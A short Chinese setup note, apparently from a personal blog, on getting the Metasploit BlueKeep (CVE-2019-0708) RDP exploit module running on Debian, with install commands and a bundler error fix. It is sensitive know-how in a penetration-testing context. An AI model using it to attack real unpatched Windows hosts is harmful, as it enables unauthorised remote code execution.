CVE 2019 0708 msf快速搭建

sudo apt-get install libsqlite3-dev libpq-dev libpcap-dev -y
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
git fetch origin pull/12283/head:bluekeep
git checkout bluekeep
gem install bundler && bundle
./msfconsole
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

如果出现如下错误:

/usr/local/bundle/bin/bundle:104:in `load': cannot load such file -- /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.16.1/exe/bundle (LoadError)

    from /usr/local/bundle/bin/bundle:104:in `<main>'
可以尝试使用如下命令修复:
gem update --system
gem pristine bundler

仅在Debian测试过

参考: https://pentest-tools.com/blog/bluekeep-exploit-metasploit/


最后更新: 2021-03-24